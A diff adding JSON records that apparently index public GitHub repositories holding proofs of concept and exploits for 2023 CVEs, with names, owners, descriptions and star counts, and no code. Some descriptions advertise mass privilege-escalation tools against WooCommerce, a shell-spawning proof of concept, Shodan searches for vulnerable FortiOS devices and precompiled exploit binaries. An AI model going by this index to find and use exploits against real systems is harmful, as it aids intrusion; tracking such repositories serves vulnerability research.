+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 688571632,
+ "name": "CVE-2023-27372-PoC",
+ "full_name": "redboltsec\/CVE-2023-27372-PoC",
+ "owner": {
+ "login": "redboltsec",
+ "id": 144297535,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144297535?v=4",
+ "html_url": "https:\/\/github.com\/redboltsec"
+ },
+ "html_url": "https:\/\/github.com\/redboltsec\/CVE-2023-27372-PoC",
+ "description": "This is a PoC for CVE-2023-27372 and spawns a fully interactive shell.",
+ "fork": false,
+ "created_at": "2023-09-07T16:17:03Z",
+ "updated_at": "2023-09-07T16:20:50Z",
+ "pushed_at": "2023-09-07T16:20:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2744.json b/2023/CVE-2023-2744.json
new file mode 100644
index 0000000000..d6b65bb2e2
--- /dev/null
+++ b/2023/CVE-2023-2744.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 737479723,
+ "name": "CVE-2023-2744",
+ "full_name": "pashayogi\/CVE-2023-2744",
+ "owner": {
+ "login": "pashayogi",
+ "id": 50790111,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4",
+ "html_url": "https:\/\/github.com\/pashayogi"
+ },
+ "html_url": "https:\/\/github.com\/pashayogi\/CVE-2023-2744",
+ "description": "Mass CVE-2023-2744",
+ "fork": false,
+ "created_at": "2023-12-31T07:27:17Z",
+ "updated_at": "2024-02-28T22:00:16Z",
+ "pushed_at": "2023-12-31T07:30:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-27470.json b/2023/CVE-2023-27470.json
new file mode 100644
index 0000000000..ec12899a61
--- /dev/null
+++ b/2023/CVE-2023-27470.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 689935383,
+ "name": "CVE-2023-27470_Exercise",
+ "full_name": "3lp4tr0n\/CVE-2023-27470_Exercise",
+ "owner": {
+ "login": "3lp4tr0n",
+ "id": 32691065,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32691065?v=4",
+ "html_url": "https:\/\/github.com\/3lp4tr0n"
+ },
+ "html_url": "https:\/\/github.com\/3lp4tr0n\/CVE-2023-27470_Exercise",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-11T08:04:08Z",
+ "updated_at": "2023-09-28T11:46:55Z",
+ "pushed_at": "2023-09-11T09:00:50Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-27524.json b/2023/CVE-2023-27524.json
new file mode 100644
index 0000000000..d28896b52c
--- /dev/null
+++ b/2023/CVE-2023-27524.json
@@ -0,0 +1,191 @@
+[
+ {
+ "id": 685257815,
+ "name": "CVE-2023-27524",
+ "full_name": "necroteddy\/CVE-2023-27524",
+ "owner": {
+ "login": "necroteddy",
+ "id": 37003131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37003131?v=4",
+ "html_url": "https:\/\/github.com\/necroteddy"
+ },
+ "html_url": "https:\/\/github.com\/necroteddy\/CVE-2023-27524",
+ "description": "CVE-2023-27524",
+ "fork": false,
+ "created_at": "2023-08-30T20:59:28Z",
+ "updated_at": "2023-08-30T21:00:37Z",
+ "pushed_at": "2023-08-30T21:00:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 688800024,
+ "name": "CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE",
+ "full_name": "jakabakos\/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-08T06:15:00Z",
+ "updated_at": "2024-06-25T09:56:17Z",
+ "pushed_at": "2023-09-11T06:49:19Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 702903633,
+ "name": "Apache-Superset-SECRET_KEY-CVE-2023-27524-",
+ "full_name": "CN016\/Apache-Superset-SECRET_KEY-CVE-2023-27524-",
+ "owner": {
+ "login": "CN016",
+ "id": 108575004,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4",
+ "html_url": "https:\/\/github.com\/CN016"
+ },
+ "html_url": "https:\/\/github.com\/CN016\/Apache-Superset-SECRET_KEY-CVE-2023-27524-",
+ "description": "Apache Superset 默认SECRET_KEY 漏洞(CVE-2023-27524)",
+ "fork": false,
+ "created_at": "2023-10-10T08:23:57Z",
+ "updated_at": "2023-10-10T08:34:01Z",
+ "pushed_at": "2023-10-10T08:33:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 711672389,
+ "name": "Research-CVE-2023-27524",
+ "full_name": "NguyenCongHaiNam\/Research-CVE-2023-27524",
+ "owner": {
+ "login": "NguyenCongHaiNam",
+ "id": 116544941,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116544941?v=4",
+ "html_url": "https:\/\/github.com\/NguyenCongHaiNam"
+ },
+ "html_url": "https:\/\/github.com\/NguyenCongHaiNam\/Research-CVE-2023-27524",
+ "description": "CVE-2023-27524",
+ "fork": false,
+ "created_at": "2023-10-30T00:27:20Z",
+ "updated_at": "2023-10-30T00:27:21Z",
+ "pushed_at": "2023-10-30T01:15:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 799192194,
+ "name": "CVE-2023-27524",
+ "full_name": "karthi-the-hacker\/CVE-2023-27524",
+ "owner": {
+ "login": "karthi-the-hacker",
+ "id": 33289300,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33289300?v=4",
+ "html_url": "https:\/\/github.com\/karthi-the-hacker"
+ },
+ "html_url": "https:\/\/github.com\/karthi-the-hacker\/CVE-2023-27524",
+ "description": "Tool for finding CVE-2023-27524 (Apache Superset - Authentication Bypass)",
+ "fork": false,
+ "created_at": "2024-05-11T12:19:55Z",
+ "updated_at": "2024-06-25T13:42:04Z",
+ "pushed_at": "2024-05-11T12:23:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 799195135,
+ "name": "CVE-2023-27524",
+ "full_name": "Cappricio-Securities\/CVE-2023-27524",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-27524",
+ "description": "Apache Superset - Authentication Bypass",
+ "fork": false,
+ "created_at": "2024-05-11T12:29:08Z",
+ "updated_at": "2024-06-24T07:07:58Z",
+ "pushed_at": "2024-06-24T07:06:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache-superset",
+ "apache-superset---authentication-bypass",
+ "authentication-bypass",
+ "bugbounty",
+ "cve-2023-2752",
+ "pentesting",
+ "vapt",
+ "wapt"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-27564.json b/2023/CVE-2023-27564.json
new file mode 100644
index 0000000000..83e903fe6e
--- /dev/null
+++ b/2023/CVE-2023-27564.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 781230884,
+ "name": "exploit-CVE-2023-27564",
+ "full_name": "david-botelho-mariano\/exploit-CVE-2023-27564",
+ "owner": {
+ "login": "david-botelho-mariano",
+ "id": 48680041,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48680041?v=4",
+ "html_url": "https:\/\/github.com\/david-botelho-mariano"
+ },
+ "html_url": "https:\/\/github.com\/david-botelho-mariano\/exploit-CVE-2023-27564",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-03T01:45:18Z",
+ "updated_at": "2024-04-03T01:45:18Z",
+ "pushed_at": "2024-04-03T01:56:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-27997.json b/2023/CVE-2023-27997.json
new file mode 100644
index 0000000000..c5f0c9d55c
--- /dev/null
+++ b/2023/CVE-2023-27997.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 665271629,
+ "name": "ShodanFortiOS",
+ "full_name": "TechinsightsPro\/ShodanFortiOS",
+ "owner": {
+ "login": "TechinsightsPro",
+ "id": 116123212,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116123212?v=4",
+ "html_url": "https:\/\/github.com\/TechinsightsPro"
+ },
+ "html_url": "https:\/\/github.com\/TechinsightsPro\/ShodanFortiOS",
+ "description": "Search vulnerable FortiOS devices via Shodan (CVE-2023-27997)",
+ "fork": false,
+ "created_at": "2023-07-11T20:41:03Z",
+ "updated_at": "2023-07-11T20:41:59Z",
+ "pushed_at": "2023-07-11T20:41:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 686590287,
+ "name": "CVE-2023-27997",
+ "full_name": "Cyb3rEnthusiast\/CVE-2023-27997",
+ "owner": {
+ "login": "Cyb3rEnthusiast",
+ "id": 143934696,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143934696?v=4",
+ "html_url": "https:\/\/github.com\/Cyb3rEnthusiast"
+ },
+ "html_url": "https:\/\/github.com\/Cyb3rEnthusiast\/CVE-2023-27997",
+ "description": "How to get access via CVE-2022-27997",
+ "fork": false,
+ "created_at": "2023-09-03T10:01:24Z",
+ "updated_at": "2023-09-10T10:48:40Z",
+ "pushed_at": "2023-09-09T09:22:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 704142501,
+ "name": "xortigate-cve-2023-27997",
+ "full_name": "lexfo\/xortigate-cve-2023-27997",
+ "owner": {
+ "login": "lexfo",
+ "id": 23701097,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23701097?v=4",
+ "html_url": "https:\/\/github.com\/lexfo"
+ },
+ "html_url": "https:\/\/github.com\/lexfo\/xortigate-cve-2023-27997",
+ "description": "xortigate-cve-2023-27997",
+ "fork": false,
+ "created_at": "2023-10-12T16:12:41Z",
+ "updated_at": "2024-06-19T14:50:44Z",
+ "pushed_at": "2023-10-12T16:17:23Z",
+ "stargazers_count": 59,
+ "watchers_count": 59,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 59,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 704180144,
+ "name": "CVE-2023-27997",
+ "full_name": "delsploit\/CVE-2023-27997",
+ "owner": {
+ "login": "delsploit",
+ "id": 127108998,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4",
+ "html_url": "https:\/\/github.com\/delsploit"
+ },
+ "html_url": "https:\/\/github.com\/delsploit\/CVE-2023-27997",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-12T17:50:38Z",
+ "updated_at": "2024-03-01T09:02:02Z",
+ "pushed_at": "2023-10-12T18:13:23Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 741255783,
+ "name": "CVE-2023-27997-tutorial",
+ "full_name": "awchjimmy\/CVE-2023-27997-tutorial",
+ "owner": {
+ "login": "awchjimmy",
+ "id": 16118028,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16118028?v=4",
+ "html_url": "https:\/\/github.com\/awchjimmy"
+ },
+ "html_url": "https:\/\/github.com\/awchjimmy\/CVE-2023-27997-tutorial",
+ "description": "A short tutorial about how to find and verify FortiOS vulnerablility. ",
+ "fork": false,
+ "created_at": "2024-01-10T02:36:35Z",
+ "updated_at": "2024-01-10T02:36:35Z",
+ "pushed_at": "2024-01-10T02:42:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-28121.json b/2023/CVE-2023-28121.json
new file mode 100644
index 0000000000..978e3fdb45
--- /dev/null
+++ b/2023/CVE-2023-28121.json
@@ -0,0 +1,160 @@
+[
+ {
+ "id": 665349664,
+ "name": "Mass-CVE-2023-28121",
+ "full_name": "im-hanzou\/Mass-CVE-2023-28121",
+ "owner": {
+ "login": "im-hanzou",
+ "id": 61415393,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4",
+ "html_url": "https:\/\/github.com\/im-hanzou"
+ },
+ "html_url": "https:\/\/github.com\/im-hanzou\/Mass-CVE-2023-28121",
+ "description": "CVE-2023-28121 - WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation [ Mass Add Admin User ] ",
+ "fork": false,
+ "created_at": "2023-07-12T02:41:26Z",
+ "updated_at": "2024-06-25T06:33:50Z",
+ "pushed_at": "2023-07-14T21:47:59Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-28121",
+ "exploit",
+ "mass",
+ "python",
+ "woocommerce",
+ "woocommerce-payment",
+ "wordpresss"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 665401623,
+ "name": "Mass-CVE-2023-28121-kdoec",
+ "full_name": "rio128128\/Mass-CVE-2023-28121-kdoec",
+ "owner": {
+ "login": "rio128128",
+ "id": 136775778,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136775778?v=4",
+ "html_url": "https:\/\/github.com\/rio128128"
+ },
+ "html_url": "https:\/\/github.com\/rio128128\/Mass-CVE-2023-28121-kdoec",
+ "description": "CVE-2023-28121 - WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation [ Mass Add Admin User ]",
+ "fork": false,
+ "created_at": "2023-07-12T06:04:56Z",
+ "updated_at": "2023-07-12T07:15:07Z",
+ "pushed_at": "2023-07-12T06:23:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 669932793,
+ "name": "CVE-2023-28121",
+ "full_name": "C04LA\/CVE-2023-28121",
+ "owner": {
+ "login": "C04LA",
+ "id": 21272230,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21272230?v=4",
+ "html_url": "https:\/\/github.com\/C04LA"
+ },
+ "html_url": "https:\/\/github.com\/C04LA\/CVE-2023-28121",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-23T22:38:39Z",
+ "updated_at": "2023-07-23T22:38:39Z",
+ "pushed_at": "2023-07-23T22:38:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 713660150,
+ "name": "WP-CVE-2023-28121",
+ "full_name": "Jenderal92\/WP-CVE-2023-28121",
+ "owner": {
+ "login": "Jenderal92",
+ "id": 59664965,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4",
+ "html_url": "https:\/\/github.com\/Jenderal92"
+ },
+ "html_url": "https:\/\/github.com\/Jenderal92\/WP-CVE-2023-28121",
+ "description": "Python 2.7",
+ "fork": false,
+ "created_at": "2023-11-03T01:19:09Z",
+ "updated_at": "2023-11-03T01:21:19Z",
+ "pushed_at": "2023-11-03T01:21:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 714083360,
+ "name": "CVE-2023-28121",
+ "full_name": "1337nemojj\/CVE-2023-28121",
+ "owner": {
+ "login": "1337nemojj",
+ "id": 36542035,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36542035?v=4",
+ "html_url": "https:\/\/github.com\/1337nemojj"
+ },
+ "html_url": "https:\/\/github.com\/1337nemojj\/CVE-2023-28121",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-03T22:02:11Z",
+ "updated_at": "2023-11-03T22:07:39Z",
+ "pushed_at": "2023-11-15T11:47:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-28197.json b/2023/CVE-2023-28197.json
new file mode 100644
index 0000000000..77944114c1
--- /dev/null
+++ b/2023/CVE-2023-28197.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 730398815,
+ "name": "inputcontrol",
+ "full_name": "spotlightishere\/inputcontrol",
+ "owner": {
+ "login": "spotlightishere",
+ "id": 10055256,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10055256?v=4",
+ "html_url": "https:\/\/github.com\/spotlightishere"
+ },
+ "html_url": "https:\/\/github.com\/spotlightishere\/inputcontrol",
+ "description": "proof-of-concept for CVE-2023-28197",
+ "fork": false,
+ "created_at": "2023-12-11T20:55:21Z",
+ "updated_at": "2023-12-12T00:36:25Z",
+ "pushed_at": "2023-12-11T20:56:07Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-28229.json b/2023/CVE-2023-28229.json
new file mode 100644
index 0000000000..f831b17eb6
--- /dev/null
+++ b/2023/CVE-2023-28229.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 686907418,
+ "name": "CVE-2023-28229",
+ "full_name": "Y3A\/CVE-2023-28229",
+ "owner": {
+ "login": "Y3A",
+ "id": 62646606,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62646606?v=4",
+ "html_url": "https:\/\/github.com\/Y3A"
+ },
+ "html_url": "https:\/\/github.com\/Y3A\/CVE-2023-28229",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-04T07:48:13Z",
+ "updated_at": "2024-06-21T00:11:29Z",
+ "pushed_at": "2024-01-08T03:34:51Z",
+ "stargazers_count": 123,
+ "watchers_count": 123,
+ "has_discussions": false,
+ "forks_count": 32,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 32,
+ "watchers": 123,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2825.json b/2023/CVE-2023-2825.json
new file mode 100644
index 0000000000..364da4ef68
--- /dev/null
+++ b/2023/CVE-2023-2825.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 689671335,
+ "name": "CVE-2023-2825",
+ "full_name": "caopengyan\/CVE-2023-2825",
+ "owner": {
+ "login": "caopengyan",
+ "id": 87455626,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87455626?v=4",
+ "html_url": "https:\/\/github.com\/caopengyan"
+ },
+ "html_url": "https:\/\/github.com\/caopengyan\/CVE-2023-2825",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-10T14:51:30Z",
+ "updated_at": "2023-09-10T14:52:52Z",
+ "pushed_at": "2023-09-10T15:36:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 817964661,
+ "name": "CVE-2023-2825",
+ "full_name": "cc3305\/CVE-2023-2825",
+ "owner": {
+ "login": "cc3305",
+ "id": 103961201,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4",
+ "html_url": "https:\/\/github.com\/cc3305"
+ },
+ "html_url": "https:\/\/github.com\/cc3305\/CVE-2023-2825",
+ "description": "CVE-2023-2825 exploit script",
+ "fork": false,
+ "created_at": "2024-06-20T20:22:01Z",
+ "updated_at": "2024-06-20T20:22:40Z",
+ "pushed_at": "2024-06-20T20:22:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-28252.json b/2023/CVE-2023-28252.json
new file mode 100644
index 0000000000..7488dd26d7
--- /dev/null
+++ b/2023/CVE-2023-28252.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 673742042,
+ "name": "CVE-2023-28252",
+ "full_name": "726232111\/CVE-2023-28252",
+ "owner": {
+ "login": "726232111",
+ "id": 34729943,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34729943?v=4",
+ "html_url": "https:\/\/github.com\/726232111"
+ },
+ "html_url": "https:\/\/github.com\/726232111\/CVE-2023-28252",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-02T10:14:40Z",
+ "updated_at": "2023-11-24T02:55:08Z",
+ "pushed_at": "2023-08-02T10:16:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 718019226,
+ "name": "CVE-2023-28252-",
+ "full_name": "Danasuley\/CVE-2023-28252-",
+ "owner": {
+ "login": "Danasuley",
+ "id": 148750257,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148750257?v=4",
+ "html_url": "https:\/\/github.com\/Danasuley"
+ },
+ "html_url": "https:\/\/github.com\/Danasuley\/CVE-2023-28252-",
+ "description": "Обнаружение эксплойта CVE-2023-28252 ",
+ "fork": false,
+ "created_at": "2023-11-13T07:46:38Z",
+ "updated_at": "2023-11-13T07:46:39Z",
+ "pushed_at": "2023-11-13T07:55:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 737810016,
+ "name": "Compiled-PoC-Binary-For-CVE-2023-28252",
+ "full_name": "bkstephen\/Compiled-PoC-Binary-For-CVE-2023-28252",
+ "owner": {
+ "login": "bkstephen",
+ "id": 8013595,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8013595?v=4",
+ "html_url": "https:\/\/github.com\/bkstephen"
+ },
+ "html_url": "https:\/\/github.com\/bkstephen\/Compiled-PoC-Binary-For-CVE-2023-28252",
+ "description": "The repo contains a precompiled binary which can be run on a Windows machine vulnerable to CVE-2023-28252",
+ "fork": false,
+ "created_at": "2024-01-01T15:30:33Z",
+ "updated_at": "2024-06-21T07:22:21Z",
+ "pushed_at": "2024-01-01T15:39:15Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 746601760,
+ "name": "CVE-2023-28252-Compiled-exe",
+ "full_name": "duck-sec\/CVE-2023-28252-Compiled-exe",
+ "owner": {
+ "login": "duck-sec",
+ "id": 129839654,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129839654?v=4",
+ "html_url": "https:\/\/github.com\/duck-sec"
+ },
+ "html_url": "https:\/\/github.com\/duck-sec\/CVE-2023-28252-Compiled-exe",
+ "description": "A modification to fortra's CVE-2023-28252 exploit, compiled to exe",
+ "fork": false,
+ "created_at": "2024-01-22T10:38:02Z",
+ "updated_at": "2024-06-13T15:43:02Z",
+ "pushed_at": "2024-01-24T13:45:56Z",
+ "stargazers_count": 50,
+ "watchers_count": 50,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 50,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 815887734,
+ "name": "CVE-2023-28252",
+ "full_name": "Vulmatch\/CVE-2023-28252",
+ "owner": {
+ "login": "Vulmatch",
+ "id": 70934566,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70934566?v=4",
+ "html_url": "https:\/\/github.com\/Vulmatch"
+ },
